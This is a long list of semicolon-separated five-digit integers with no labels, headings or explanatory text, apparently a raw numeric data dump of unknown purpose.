27831;20429;11937;19876;29812;38167;26964;52873;62013;26068;15251;40608;25960;62369;38204;11855;27149;66032;12789;33815;18810;25232;41242;21489;48718;49223;26296;10206;44957;40997;41872;40560;24280;20255;59449;13882;61380;18193;21862;16793;55982;43534;17233;55439;27711;13222;39743;26250;23788;24784;23034;19217;63221;42078;60695;36976;47288;20358;61575;37413;59447;30906;35854;40283;52776;49590;26078;51160;62904;20342;39921;28431;24603;21961;51526;50603;50318;48610;23547;24140;44830;41119;33886;54415;22381;63647;26519;33795;19205;49453;33053;54959;49350;15482;16553;44519;22976;35594;28647;41655;21899;31930;19064;53379;22006;49829;13917;15954;18031;37594;65407;12069;19789;54323;24962;34107;31878;48472;46719;24789;42213;14941;41460;61307;36727;25182;30642;14069;64809;46375;30999;45469;45461;15072;10307;60326;21370;63122;17222;64192;20669;37247;43097;28170;16851;13543;53547;15215;26118;66944;16433;40548;33054;26266;19450;14881;33899;19190;38898;12263;18379;19809;11417;24370;32410;18899;48638;49488;52056;38809;32691;28969;54603;33188;27493;53406;39624;65688;20357;45087;20718;62419;64963;37401;49526;48971;39641;31559;48839;31920;45811;30455;27249;33958;55835;47894;38819;31894;55875;46440;41295;18109;36971;16548;65860;60827;56698;64699;34534;11715;37739;12718;33025;60211;26600;18747;27035;27315;24557;27221;54383;13271;52939;52774;11360;55217;59560;59562;66537;34389;58480;18857;49066;49121;62605;22035;23753;55065;55843;22361;56059;12121;26837;66701;61844;11912;11613;34557;58959;14762;43575;13547;57419;37959;41228;31444;24080;40452;45109;35519;38404;13767;47372;55574;60430;13683;35776;38728;43252;39832;36924;60678;35010;62823;38524;54745;15282;15647;36644;18447;55599;21998;65031;37831;31227;48762;54240;58483;18428;57767;62400;62273;42828;13727;32782;46017;23953;62793;19781;10946;35227;19883;31673;14812;17582;11789;38427;26228;30740;64269;62429;66883;20983;59801;10053;25204;52782;30114;13124;19682;56169;16405;33226;26713;50688;47348;47740;60965;23664;27481;15855;64578;30062;25269;27638;51972;43130;11638;28963;29218;28207;15304;57080;44223;61463;34231;44618;62134;62849;64901;61286;46401;20001;59290;23846;54496;58930;41808;60835;61155;25029;50876;24731;42790;57432;52556;60637;13459;18287;34062;11580;50143;38288;65772;44146;45389;11126;35195;51219;61270;52481;22951;54857;52913;51170;10311;48554;61539;58457;30101;61901;43739;63749;62145;66819;23839;42467;10441;41714;49727;50654;38344;13829;63566;36979;14714;14518;58627;11617;24457;20177;41540;29521;32071;60707;62494;47176;10081;55504;17993;18164;16317;44243;16444;39151;36641;42390;43315;57284;57827;33613;31656;42275;41182;37677;51923;41904;22258;17619;63941;54135;22408;47052;21980;50376;17025;66171;50664;55357;29479;18116;51672;18806;65657;58668;42469;64135;51861;21938;64646;61823;65010;21420;55419;43667;37748;59788;41745;58098;33030;54889;59364;30827;46900;39163;51500;38716;28613;50135;56341;23231;32478;65764;31415;39803;65328;61953;33774;66640;41045;26196;55052;63161;16659;64263;61647;59470;50869;57142;40668;34336;19775;50248;24258;58845;17731;16415;18402;31484;37492;62382;40681;56521;36444;31791;59339;14909;20586;18798;24999;22215;28486;21587;62658;19738;50395;46491;53470;31618;64137;39373;55660;50541;38285;24322;64453;14520;35016;40554;27967;14996;39656;34032;14828;41217;57374;51010;14028;28815;47212;14440;12374;27873;46269;30318;15123;59353;31319;35947;57155;18340;42779;22075;45344;34508;22920;22677;61549;61043;41766;45234;49687;54000;46861;55639;45285;33285;22942;62576;37282;57099;54309;25798;41308;30590;45249;11419;35196;10454;61505;45973;30967;43331;63172;57363;48723;24386;24167;32869;62821;59575;52115;13164;28640;11093;22137;65465;63514;14945;59764;51885;14082;41462;51787;61483;43414;29529;33247;20394;60364;16912;23733;54530;13027;40620;66714;65561;48435;35067;15313;26782;13907;19039;51420;21268;11721;18538;14467;19804;14846;44141;15634;61783;45653;30932;21747;41557;54296;12558;61382;36350;60392;20067;39432;29221;61928;41683;33260;37223;55213;36303;35276;60195;18588;52092;28084;32330;28567;60519;21802;21776;58018;60682;48850;30750;60035;35145;58079;45544;44501;13376;12386;36192;65105;46504;43506;29407;50959;53221;31466;40519;29792;15226;42417;62567;33698;64008;63040;49422;28399;48178;27888;57787;32851;30034;26107;24608;49496;15441;55102;64410;62324;59369;43216;22856;43870;15931;13968;37616;47575;46222;13930;15949;47000;53190;61029;28059;26120;63814;49282;12027;38172;42536;40697;14820;45984;36154;38680;41778;40741;18619;18918;29502;43262;16726;38345;48265;23609;47896;42006;64120;37553;38443;33562;48730;26825;40875;29087;39521;40980;46593;10964;30778;26931;55016;50983;36214;18557;57031;39413;14724;14930;62487;29086;50648;56796;30316;38452;20731;33858;55056;43202;40100;46424;18312;35923;60393;13810;45881;46532;26680;46443;28394;25920;10597;48227;29473;48170;10358;31188;16123;28758;63504;61162;12847;49545;24694;58971;65161;23389;12208;62833;48684;48641;16070;41253;57592;61972;37609;19477;11486;37245;18758;29024;35595;48480;32559;57493;55370;40673;54735;51201;31739;32531;30450;43079;56667;63388;30372;41291;60730;64447;12683;29108;21296;22588;59845;64092;30996;12603;66539;23165;48954;44932;11645;50240;46234;49883;53279;58261;23926;30580;14114;43561;25587;57629;55869;63095;61959;18087;60578;42746;52736;63330;65387;58843;63662;58367;34408;65348;50573;31226;36062;25111;38437;60602;21986;56787;65839;61614;19847;16808;26436;33839;38542;35383;52077;31160;51512;12095;62634;66041;27699;31476;25909;51932;27743;64201;20844;19949;39037;27632;12240;19661;29884;56203;52040;47525;26615;10488;54264;56711;16394;24228;58355;54174;46122;49872;44735;56050;28685;55468;44731;51510;56501;57582;37482;10208;60623;65316;36646;27870;31248;19220;63976;35498;41487;14409;25695;56948;56198;14207;10077;48401;39247;56226;61712;17066;51123;30908;54599;54782;64593;38523;30980;46156;55825;65142;29377;46856;55520;10324;58574;50916;10560;37417;18846;26446;48968;54751;25790;53464;31720;23206;52386;28781;22145;37238;65975;32520;47792;35461;23961;20981;41707;20594;45022;62179;28299;39433;28013;11198;20547;51829;46472;52968;49357;11108;26954;43657;61173;25634;65077;48582;32935;32458;42250;62342;46366;13299;47573;27086;32921;66414;52484;47302;60651;10639;65537;34566;56777;44949;60340;20151;37071;37918;33259;29828;50693;17547;59827;35952;34577;53090;18773;27680;26771;25976;37723;39947;35500;47478;52746;47839;11733;11225;40746;29079;19813;65756;20036;34838;19848;31997;42089;60847;58461;16116;51487;23605;47015;35955;66680;40629;58177;24716;64168;46625;22312;26532;50703;36111;30564;46712;50998;22466;30618;27319;50975;54116;41440;36073;63351;40425;30847;33133;30425;51379;32579;32485;60534;60717;56974;38967;39268;63796;62936;31684;54605;28976;29516;61223;65958;25564;13458;54407;56574;61914;27406;50069;56072;21208;60086;23182;60805;33838;66565;24144;29962;41379;32685;41874;64923;14811;46664;56319;41717;31974;30002;24802;32698;53479;61741;20597;42928;66100;20546;34619;65405;56287;10325;58833;12818;26246;48212;50166;34938;32608;58301;62095;17817;18907;66275;66521;29641;44921;17701;64398;41367;32029;58329;32550;47530;64139;62826;43107;51737;55421;51602;26323;42156;41056;20038;44446;41726;50196;22038;34168;42206;58932;33884;39643;61490;12844;45749;57411;12443;35282;52929;35106;17550;30169;66672;53348;58973;36782;57721;64790;61515;17480;26091;62407;41750;58442;65957;16826;21878;17195;66039;25362;31693;28326;35958;52491;52231;34796;15795;18782;10515;30260;66218;54711;57710;18869;65670;26640;16094;10070;54730;66970;59644;31003;51081;66582;46407;44468;48984;65162;48835;13403;23732;50530;51667;42832;49740;61104;41313;32397;17744;51931;51886;11827;42161;49465;19574;20687;56404;35562;66454;51796;16512;35935;65444;58926;41499;60640;19434;19609;39212;48165;20285;30496;43301;53607;58725;46825;17755;44720;22147;51209;17552;28981;47729;34224;23457;62214;14094;20493;36853;19498;16408;59380;42283;64036;31194;37185;32461;60115;24321;48771;41785;39384;12835;40535;65022;34228;37675;10956;55028;16787;61870;27033;18249;60038;43080;36921;24087;45885;15116;48424;65499;33487;23996;35405;49753;62790;48752;10595;32569;28235;45233;48328;40756;11831;35945;53788;29292;10570;65359;48809;28278;58901;15205;10197;54640;17631;47887;21696;65483;54973;47338;15966;57109;57514;60874;20399;13106;23364;42233;34953;12813;51200;25925;54263;59106;42109;66727;55800;31840;52971;52132;34121;42152;47055;16960;38978;11085;17759;53092;58772;48219;21918;50553;32632;15454;28432;21589;50622;61488;64368;51615;36380;36626;66198;26411;15241;51596;15668;59430;43640;44936;29747;49758;10251;37467;43970;37817;49730;11151;20217;47091;43063;22282;24294;61979;39580;54373;20154;57517;43002;48483;59406;66812;13072;20224;58186;33601;65014;31429;54468;16513;63127;41044;11477;34664;15575;31148;39725;32321;51971;57922;48473;51460;15633;51780;43579;45151;66022;46715;56438;48445;17481;23485;19027;63805;57595;66810;27046;11471;13341;55483;42939;25368;43399;33938;11164;66346;62917;49973;55712;65357;31245;58684;18280;14008;61617;21070;26537;29052;40497;26780;29053;45397;39497;48263;18601;29573;31060;18589;24008;49185;36201;29588;22111;56855;36363;28743;27464;18764;13756;37291;58904;13584;45462;19686;43263;12116;16348;41346;13324;27991;29719;38364;31020;48207;24536;60090;27869;61993;25528;32883;50031;26459;42705;43542;64314;20531;16684;11393;23477;22256;53341;31638;48945;40614;29041;61670;62286;44687;63174;60994;14492;39454;13221;12877;11544;22671;29414;63401;16542;45209;17629;44248;40723;39479;11316;14033;15615;61685;33023;63721;63553;60149;50374;23906;65676;53084;35751;50158;58756;26186;10958;28786;44978;35247;49480;15778;20138;65180;30629;38713;47690;32387;11303;48350;45362;27255;41089;48508;46623;31029;16597;40820;23468;41166;11550;31966;49720;23037;43679;20554;52268;53831;25563;63595;55125;59320;26273;54237;65607;58778;63502;40814;52516;57353;44582;28290;48244;53330;28158;18939;21345;27673;40316;63201;25183;22623;35207;61558;26422;64566;28644;50772;27837;50779;29611;64924;43138;63279;21502;45361;38436;25885;27304;53613;40364;10390;54798;46114;54665;48300;32768;52396;36819;26225;34154;11607;33252;20806;52344;11448;65283;14757;12237;36895;42872;22196;52297;18385;60635;60039;60192;13525;36132;38008;45030;25841;22625;55267;15292;30845;59078;55275;53863;45754;25145;61139;64920;49246;65880;35336;12597;37430;63488;65007;55424;28878;34651;56559;23255;35126;59782;53669;29371;22949;61571;53999;13941;35810;36510;60760;38920;38077;26854;45298;28136;65451;37259;21891;53002;29120;57579;54230;11267;50301;47369;18732;44035;48869;41598;22201;24652;38484;63542;63315;51265;41946;50064;18078;46163;20706;22667;40203;64853;36332;45091;40351;60736;53452;24996;42474;42098;21755;53312;10073;42515;61601;58672;66720;43577;45742;27071;27779;56638;63150;65192;28520;40181;21810;24209;33967;51953;45258;29154;39238;50470;53255;54456;44380;48497;53492;52651;38999;19889;46812;14450;20343;54120;60033;58100;19777;45606;21123;30291;61482;23054;66751;43122;40233;39065;48926;34467;22663;33461;25097;11183;53132;16938;21331;34379;40744;13139;26679;33721;26146;23762;65426;66538;18368;49437;17100;60765;12533;49938;47679;16879;56860;29935;40966;11622;42560;40111;43139;42655;39655;26498;57448;51083;36129;35008;20107;41679;12451;47761;53421;66652;47907;36277;52612;53096;56444;27786;15175;59443;58315;49731;45733;58312;50078;15491;14544;36190;53298;40059;43442;59569;20356;51687;24768;56921;26366;27285;17743;33758;58878;15060;10455;57506;14515;13444;60206;40637;14036;20750;35159;29536;44938;17244;12377;51663;64808;43690;17382;17738;47260;49873;59520;19441;32269;28066;66400;66600;48602;29267;39077;53111;49500;56080;21523;30484;25008;22909;11523;24303;39085;60425;23111;50322;20975;55043;35862;30268;53589;16460;50458;53561;26987;66105;37795;45710;51761;19988;10805;61374;27309;39836;58667;35104;15314;10646;22994;57973;39013;12410;37210;25963;62153;33570;10482;18614;21273;48622;28005;11915;26280;31614;44066;27606;28464;33707;35570;28795;34023;65095;16576;66297;34893;35320;18858;42357;62969;16783;57267;53712;59358;64212;50377;51473;19495;28502;23162;53064;50550;49592;25491;63587;17366;19066;16623;44291;16155;32162;22320;28512;51488;50865;38500;64942;10278;38129;15068;60140;11488;46437;33235;43650;45780;57532;46001;25531;26951;40333;48661;66379;44185;42014;45059;52212;10110;65496;29481;47402;63974;25751;39193;14189;55665;18076;26915;64158;11946;51012;21255;18664;28015;11783;11695;54205;21686;36341;12455;35240;29164;15583;21465;15103;13529;29195;13541;14211;10025;27250;36002;53918;43538;44974;65233;26587;56028;23482;42100;41849;54622;63196;62433;13970;16176;58101;12435;55936;22474;62652;14953;37083;26555;12920;15270;39287;20331;32955;14568;62060;50751;35224;26940;44993;42891;18639;66380;47454;19191;13785;27762;30856;45583;50756;26402;31885;27736;41587;22394;63119;18630;44275;65520;23118;23751;63610;55273;29445;30222;23607;59937;27655;66838;16109;53088;61373;51594;55803;61010;25543;15803;58720;19698;63558;59919;31666;36449;66612;13694;11233;20890;41319;45919;10613;63937;54576;21493;52323;10537;66575;26558;16998;54177;52928;41468;37874;14573;44842;45354;51913;65674;54636;24103;50897;52681;36959;20729;40101;12502;45913;23250;56386;15088;56634;45251;34377;50864;50073;38046;33674;64603;48191;30208;22217;55899;45767;60269;46904;45215;22122;19478;56556;38505;35607;34990;29694;29009;61174;18036;59492;41239;37908;38067;46341;14279;12693;58831;66948;35293;43893;47029;44170;42495;32401;18290;60395;36758;38212;65843;23628;12661;29406;27912;34318;12682;66092;19507;21382;63307;12446;58620;62588;20109;30572;37358;32344;13789;43450;40524;37541;13329;65543;58432;11654;15498;47375;28928;47240;63377;61081;22252;57848;58335;55088;17153;46416;23603;18424;16631;61709;39453;55320;51849;24670;44447;40999;53108;47130;37489;28308;64014;34076;38884;43367;41026;55004;44738;29029;16071;35095;12865;47796;32983;48397;55692;52291;66965;40943;59283;45421;24779;37105;59705;34546;10261;29289;13498;64397;59757;64179;47273;35212;61776;37913;36074;10892;22987;51781;53413;18374;50640;66190;18712;39354;65008;16459;38071;34731;65920;18598;20400;12506;15690;20574;52446;60325;66832;19666;26957;25846;46906;60734;42137;47269;59008;40358;43741;66155;60508;18876;44127;10720;50692;23491;55860;30031;14439;25680;15024;19228;53113;22849;31975;23290;39259;11373;35404;52613;45324;32206;63288;13439;33312;37696;65818;46941;60752;60696;33320;12229;49451;10665;25827;31338;27018;58513;33970;44826;61212;65002;43726;11097;20412;50113;46245;28164;36101;16905;47471;10520;41962;35779;41169;34537;11980;39062;64288;42423;17549;35820;60001;10194;52482;12627;34361;41400;33616;34935;55185;54930;54975;53623;12081;57370;46166;21744;25369;29499;23155;54906;14647;47572;40767;17493;63412;60473;59014;24421;66021;25359;32678;27401;31722;21513;24883;50180;58559;61660;15742;46377;59539;21624;61032;37759;18152;64098;33881;15822;52160;20213;56915;46273;61042;31558;25523;40834;44364;40199;49147;33526;64981;48797;10400;30003;22809;12477;35267;13992;42616;30412;43468;53282;40241;42618;22503;47315;65069;40528;56793;49045;10759;53557;46863;53100;25728;30764;62365;65067;33514;33245;60693;55545;40410;42999;41740;62663;57791;50943;39134;66588;42717;65395;23113;12952;62046;40584;40831;37899;34165;41703;48379;56857;20092;18643;11952;56092;18110;44674;57307;16314;13345;61883;48918;33849;66770;35108;27534;14648;12569;16384;66559;44315;11563;37611;63138;29710;61108;28578;63552;13162;29742;34264;34266;18449;46857;44502;42090;44688;57318;36466;11299;60861;15504;61487;44247;15725;58408;44483;49482;41732;63812;15693;50015;18256;41501;14334;29938;32740;13700;14892;23516;24858;13026;31778;62564;41809;25040;13723;54031;44326;25206;21642;48427;12657;63101;10980;20560;65460;17069;38135;50176;44813;18770;19714;20659;58167;54687;43431;16615;11547;24334;41148;66494;16822;45147;14517;44703;51679;49841;16945;50941;53225;57190;53534;35848;45496;61795;59280;27801;30360;47470;18099;27085;28684;20739;61468;57152;56021;22130;40354;23542;53518;44504;39153;12490;64107;53966;51852;30183;49265;12712;66643;49623;39347;63582;22755;44532;50872;59846;38512;63953;30212;14825;21677;24056;17463;39584;42522;55001;53997;59829;52817;22751;66520;33371;20889;44955;10788;57704;27630;63665;28459;42009;46486;64001;66598;13160;33452;23697;29213;45094;21474;38926;16375;60549;42177;29276;50311;46876;30952;44670;35034;31518;21211;11703;24829;54051;16575;16262;28070;55934;37288;63291;12515;21922;19952;20056;55846;18620;35377;28841;50378;56302;14585;15132;45593;12748;31006;28460;63522;66481;21407;49181;11470;53025;42916;42210;50607;31246;39510;57631;60520;34785;36518;29432;40193;19976;38492;63765;62183;30644;60628;56529;43604;45351;17462;47464;56866;21167;18122;27553;44444;31455;41297;54443;66274;13542;10320;23981;30112;18586;32688;44982;30674;14147;32474;19003;66012;34339;31364;57243;52890;45077;39002;39890;47251;27336;56227;56947;18132;12735;59111;37309;39499;40667;64170;37851;13021;25650;52745;16981;12356;59224;25547;10066;31866;57151;44606;46829;22818;17700;15067;31985;15451;66183;19865;13597;19664;21563;60922;45261;23171;40839;45971;48523;25357;53323;66259;38936;16712;35175;53031;16791;37659;23324;12573;62332;23496;35467;12213;41592;47555;12822;58111;15789;11206;28054;49409;45228;37025;33443;27710;61548;44370;13490;49366;35638;36343;66309;63266;17142;19037;64964;20485;15563;23222;32241;53442;34919;36863;35740;51416;23940;15706;31437;65953;49828;57059;16756;34000;40320;64424;63398;59401;66270;35341;20041;25049;18220;11567;14917;45504;63319;45542;12266;37490;38166;59498;64474;58215;21890;25810;66943;66858;15264;20330;66492;58424;30707;29438;43605;55099;45569;44179;51760;10475;13845;51417;45708;28468;31550;18594;35720;63013;52874;39057;44829;15567;42932;53253;29094;10011;17472;58588;48186;59612;63455;46459;32624;46814;42726;54172;10026;17079;13054;30890;14247;49670;55619;33343;29236;20829;32744;62791;31541;38451;10863;60538;21155;39210;19168;59604;34885;61143;43923;59345;58172;45540;61965;33003;39770;66449;31735;47398;64019;45961;26153;15790;65769;23024;11572;59138;30949;28343;54557;57923;16742;45529;61467;36430;42765;37014;38473;38521;45088;51218;14516;61730;33377;58033;46325;18958;30826;65277;35310;25407;61715;29970;64331;30147;56613;50617;51894;39912;56997;13873;12922;40879;36004;42661;24285;50465;58737;66335;66490;56076;27279;38626;19794;55054;50721;54766;37704;34671;56084;53344;55253;42222;25520;33405;54091;48807;40042;37486;35671;32794;20367;23601;32649;22479;39853;14570;66369;56476;16673;51499;41855;35568;28234;27356;63777;53514;15065;66338;30595;19957;10180;22828;61306;45495;47383;33772;26835;44771;14454;14773;27067;34538;57210;44439;32570;17583;33792;31630;38456;27476;27879;24286;23297;26673;24411;53692;17350;45175;31414;61251;10478;30753;34505;57004;54071;30203;59010;50329;65079;28530;66483;43020;33634;38901;13888;52001;29070;15953;24719;31694;30538;20275;19981;60822;42169;20623;54743;12046;23415;10723;52518;31867;27558;28112;47409;33743;34466;35307;23480;27625;33126;46409;42406;51723;52903;59241;10994;45239;29709;66069;25167;63813;59012;31012;59696;20248;44718;48236;24964;44164;63629;49904;44683;20924;37902;62075;21126;64126;51189;44555;45480;32022;31511;19833;16654;38048;27047;66703;22941;32009;21229;55268;21409;46573;16356;22728;20444;36145;46893;25432;54712;37464;63012;44946;51661;50336;42488;30555;27968;36999;30202;57058;45259;31832;12986;42920;32629;25734;38617;24997;58280;25878;62178;59730;61101;60216;66971;36517;36484;32704;26421;46412;62732;55837;57581;46059;21579;65063;45064;36105;41436;23123;50446;54332;49519;55274;27437;57915;52685;19308;10299;39007;12393;25884;25355;18310;13610;30343;59929;65438;25969;49038;44981;34920;60881;17554;34187;42729;23900;17699;65371;61991;58948;35309;40296;59072;19886;39257;64503;33232;40348;52346;14711;24506;51351;18505;51595;36892;31506;56632;49429;43698;36933;51513;54290;63793;59104;61064;58036;53391;11118;55500;52483;16205;33730;46092;33498;23597;18626;27093;33336;24184;52303;44337;58333;17999;63568;66585;29171;14643;23199;56908;25772;31940;44163;10647;29128;63788;27109;31236;49009;19940;49372;27794;60186;35066;62925;19309;58771;59759;34092;60977;61653;43007;32984;16015;19568;28093;26832;25700;48688;16665;55384;36247;22499;50616;29298;66888;41864;35148;64270;62771;38406;63353;52750;60880;51763;55878;56079;54401;59101;51974;15646;51601;56447;23276;35970;64706;25158;44845;37720;30403;57315;10499;59643;15296;12417;58484;14755;50508;58572;55114;26060;21287;36406;41749;62688;24646;13790;24793;52060;59834;57908;66742;57200;15817;28172;22489;26399;25422;34049;32972;11439;36616;66295;64587;60862;16398;63255;57528;10024;49803;29533;35412;29212;63211;30532;20286;37779;52713;51772;27914;56601;62322;47184;52940;53040;29528;12436;15711;24020;52467;23103;20027;53195;62417;46159;51348;58038;56679;22783;28961;23492;33195;36668;45405;64473;64576;47124;18813;34006;32480;39448;19397;16933;57112;19635;59079;14173;57400;58897;55280;50251;52672;18054;29100;15630;53979;58331;26128;32992;23433;59832;58469;45260;28627;34263;10703;57818;38951;29480;53098;14108;58251;37125;19933;46768;54624;64829;20885;29716;13523;22410;47128;50255;18075;15505;22826;23190;38868;30592;58374;56968;26221;43822;61777;13167;58863;45770;21220;19287;30497;31903;65642;14091;37188;42546;11371;46484;61136;33043;24643;25894;65713;15448;32926;55616;26111;58441;15056;10497;49907;41545;50942;10106;59819;30434;38545;30802;21191;34539;61455;18196;23586;22674;47901;66137;66646;61774;39635;44843;30944;50280;27302;52253;44595;12405;61160;32279;52603;10207;36128;20579;60406;53652;15692;52309;42843;16063;14838;35089;23969;59414;49789;29889;22095;60417;41288;17501;27957;17156;66115;28076;12607;16646;42450;14109;55689;66214;65904;66814;61147;32518;29643;41927;48669;27586;11476;57518;48671;23356;35765;24093;11753;12248;16779;58961;65847;35781;32987;30406;24984;31522;25686;28556;63957;21494;12871;53501;27578;53508;53815;51317;17499;65134;38138;60996;25348;45338;12238;64746;54917;33670;50243;39629;42570;12570;32228;45004;62970;18686;32747;54695;10466;34753;29936;22732;33883;43021;40132;30939;40897;55334;61517;34396;49105;65889;57931;48820;53201;17340;34683;62251;59519;39074;21036;29468;54632;60179;41951;19858;43155;11423;11909;24797;61303;17593;52877;12667;41260;31809;20632;30107;14505;60975;55447;53512;24014;31058;53653;57461;42736;29541;18596;57820;59926;38001;23750;34918;62559;54816;20634;17810;48224;30452;63250;22836;13570;37997;57365;35142;34591;18197;21990;36166;28150;64579;63069;26463;23078;27082;48973;20252;19987;25216;65947;44863;41008;28960;54582;38773;57275;53528;47211;30774;17991;25566;29096;37587;33663;44079;26754;57746;50324;14176;28660;10966;52617;32809;30627;59261;64206;37871;61860;21529;57687;57258;62194;23956;66622;48337;32918;14698;40377;21024;41859;15968;10724;62457;53398;58821;29265;37346;53713;33810;56992;64727;43361;17630;13270;43954;29341;26145;54939;61403;60712;52501;34319;41243;49906;29374;40058;27056;57088;46910;24399;61763;51973;53720;47858;31534;33947;49054;28273;56151;53238;55715;50592;54818;13372;52920;57366;33675;38608;33928;36834;25387;48846;62533;51220;43290;66669;16946;44742;32601;65979;43291;19268;38700;66470;51478;26195;32439;45688;21431;28764;25633;34748;23069;35626;41209;66080;45707;31624;61385;21209;55752;31779;17997;63192;52844;11623;26744;65367;16113;65909;22077;31504;15586;28083;25193;13861;49504;44611;19068;55177;57620;47323;48693;50610;21165;24547;11878;54991;24198;30935;66896;30652;24435;57022;38475;48760;25382;38637;33311;33329;34689;36138;60742;45188;33451;13733;33676;10871;32501;30185;56071;11368;13168;54841;64316;66350;32101;26203;33629;56604;27458;24741;57403;40758;27539;62190;34265;63038;53331;39683;28650;57214;49368;61739;13653;46012;43171;34448;20293;47599;29206;31998;53296;33918;55764;56687;28174;19739;65278;54457;34470;18608;37242;63764;54946;32791;50620;62140;25900;39408;16850;29675;45596;11062;34418;38595;46642;41444;42624;66182;55070;21622;21879;32812;52628;44570;43067;12445;12862;30367;42995;21926;10925;60771;47543;14245;62049;16150;42686;49690;12698;23759;66114;24907;21969;60441;54275;16992;61342;14418;21876;66280;40263;32243;44784;27032;54659;62159;60414;30269;24985;45932;59393;54929;14743;28477;19415;25967;58311;54359;60394;21737;63792;37935;50802;39369;22183;20937;10260;43743;44824;58947;54232;31697;59586;23195;49540;64897;50783;12312;44672;18875;27584;24059;39694;62489;43803;14523;26371;20526;60114;50379;20446;64251;36390;40268;25014;26001;47238;56278;41160;25496;36337;31395;51727;64736;63895;27121;40612;23386;50572;21410;48828;17032;45991;65215;45763;63669;46408;53625;47871;51620;56365;21113;31788;26357;41854;52769;17210;31225;52676;24971;30286;49162;34949;51086;25464;30981;27670;54379;24834;26170;23831;49534;24660;57854;29960;17588;52717;10363;13781;55882;31969;34888;25253;29175;35693;10582;61550;52966;43755;31146;55281;40422;47542;40154;15984;37637;52477;12083;36441;46003;25501;15277;57132;31882;21144;44076;17772;10853;57898;61197;33105;38058;46248;12365;39745;47541;38782;47517;29373;56527;62015;52463;62829;32477;38983;13509;48892;24977;23180;54683;40934;56767;16636;56357;24298;22657;45766;46006;40585;55996;20996;48587;54035;49268;47003;19679;55770;46493;15299;48636;15124;22661;12809;49081;36791;34258;53562;52457;37836;58856;63139;39240;17442;32594;15943;32125;50557;53268;30459;19760;42142;39192;46113;13596;48832;61187;21093;44028;37624;19389;62346;57538;15007;45374;14486;50918;10963;48902;12720;18072;42216;56712;52751;54715;60207;61650;11554;62206;16153;14488;23978;63555;35189;29959;22961;63331;20803;23619;12825;42851;30705;46475;28381;12623;44780;17465;16036;40958;14196;60957;60841;19753;24591;22709;50927;37606;63480;52101;32219;56057;25682;22983;46937;43317;32109;58766;65850;47239;42940;53389;24204;65722;31379;19421;32562;17088;57853;42629;31264;64309;13174;49878;17536;29250;40136;66444;59582;52583;15288;55538;26944;38315;60447;23091;63955;57118;51396;66561;12965;32821;24678;16075;36236;37909;38661;12970;30837;32138;33198;57406;65257;53168;55739;23722;21376;65148;23532;66110;23564;31336;40359;62671;22072;54248;50362;26076;54300;25731;51428;64602;22070;19555;60404;55638;22693;34765;49286;25364;43840;26743;61176;33650;15048;18546;10359;12643;34870;20756;36169;42437;39128;29682;35133;61006;54684;54722;38859;46817;60660;34285;37252;51854;28491;55314;20280;55146;47414;37496;22088;43043;10974;45927;64217;33898;38306;49573;38590;65934;62359;59921;15330;44026;47287;22764;18815;18633;49642;64679;19782;55724;10439;38723;55556;12115;26219;25830;42540;61677;15523;25236;49047;48449;15290;29060;64320;36388;51880;65921;10191;53126;18863;18525;63026;59387;30246;18998;49999;44103;45455;37363;28639;45994;56293;48277;47494;66458;63244;28514;21956;53963;35213;44986;59732;19072;51631;45073;57529;62055;50400;62697;38694;15590;50141;66189;28926;32132;32024;14606;13044;64235;39669;25742;64228;34522;24801;63588;37778;15352;20003;41157;44455;56038;36841;60257;21790;58211;39140;41892;10398;30498;35592;66217;37962;12284;10091;46920;64559;24837;23247;56255;49793;39942;12588;13126;47859;59495;31031;20188;32425;28304;41270;16457;65592;50186;39141;43929;66868;64365;40191;26015;16086;41445;31908;37517;50781;62177;48939;29914;64925;27856;31819;42316;29867;16970;53374;28240;47365;13190;52318;62886;65872;28179;54772;33068;43827;11134;44316;29512;27236;63453;48577;66301;62225;22238;17339;55299;57219;28700;61216;14494;21933;64744;10857;65879;20187;35166;53797;29255;22548;17601;62375;21752;65170;53080;25390;50117;32378;15247;27883;18826;39072;21434;64147;40349;16541;56492;20045;36495;27846;30130;47606;50108;31337;40225;54361;64842;10280;46879;62817;32476;47107;56283;52768;13384;58164;40505;35950;58970;15558;65285;43495;27559;15061;13428;11586;43338;44044;63324;18539;18411;66147;31742;50421;11784;42871;61319;18254;64452;31976;48517;32156;27521;24848;52840;66973;43725;29486;38568;23643;20811;58306;46888;40683;27683;19737;63740;22905;12314;53634;19885;53258;46221;29589;51632;65754;10896;11920;57613;52825;52836;14588;54726;46299;36799;25361;23833;16243;56179;54996;45385;37074;24433;60420;54672;52044;45321;38509;31677;51655;19056;59756;17315;54284;24230;30470;63341;36357;64987;51860;29644;51237;26295;13327;58107;32063;21656;51246;15993;27338;30997;19969;27269;25586;56292;40802;21127;62635;11890;28800;62701;29178;60697;45021;38062;46279;35867;15533;65980;48696;36308;18342;58278;40322;25494;20670;64113;13086;49214;28673;31958;23758;52597;11887;64582;51673;55644;47762;15064;19900;28698;66256;61074;43206;47495;63147;31465;32510;29350;19116;26533;21610;58013;17003;39883;21569;33333;21965;52495;51580;28748;48539;10951;61818;66019;25455;57477;60107;23573;13722;39834;24101;62252;26429;32148;60830;65898;36783;57067;26586;54397;35380;54597;43201;32284;53112;41483;40008;43296;47664;43531;61435;35037;10727;12941;52403;29550;17034;50346;15159;28211;30889;42314;45554;53159;48396;24338;65091;10530;40216;33321;41036;12765;24625;56589;36392;54381;58562;44075;26008;53649;23549;60692;57983;52814;12788;42642;33874;42911;27901;31461;34903;56917;23129;64518;14479;45570;49628;37824;24175;59013;33071;64971;26608;47250;22848;33574;66446;19382;31664;55771;55361;10395;40678;61703;30383;15808;11508;29538;28153;59417;40248;51032;53367;10979;52864;34905;42822;16780;35518;39423;35725;38149;21575;66926;30336;53143;13885;31746;46033;11340;29872;14491;21651;19338;29893;15355;39861;61566;65004;34629;62500;41794;46429;10721;19113;41805;30667;43887;24953;30915;27561;32074;27490;63704;17585;46206;60774;25323;46907;49320;16690;32359;42842;33055;42738;22532;64259;15660;48853;50315;46932;14463;23724;10716;16440;32737;56480;14001;18275;20920;25380;35791;58630;23357;42846;27340;23797;39852;57943;59171;31990;16929;55928;57066;53641;57895;32123;26052;27845;21518;19908;60656;47207;30504;32837;28022;29296;47400;38987;64697;13531;42921;12057;50391;43003;37829;44422;66396;40821;24831;31340;45341;40695;44299;51786;27495;20603;40155;56027;24127;20379;23606;61092;66388;54970;46939;53425;13314;13842;53154;21354;23367;46892;47291;31526;62166;43412;65728;61051;45474;51403;44876;33264;17616;46271;35761;60000;20753;58421;48716;52514;27768;60155;29049;14966;45651;20441;24657;64652;33006;65666;26692;12705;39179;58950;20549;39961;36566;35232;51821;54740;32176;14103;28345;21763;59672;20199;66750;59693;21216;25821;25743;53274;62078;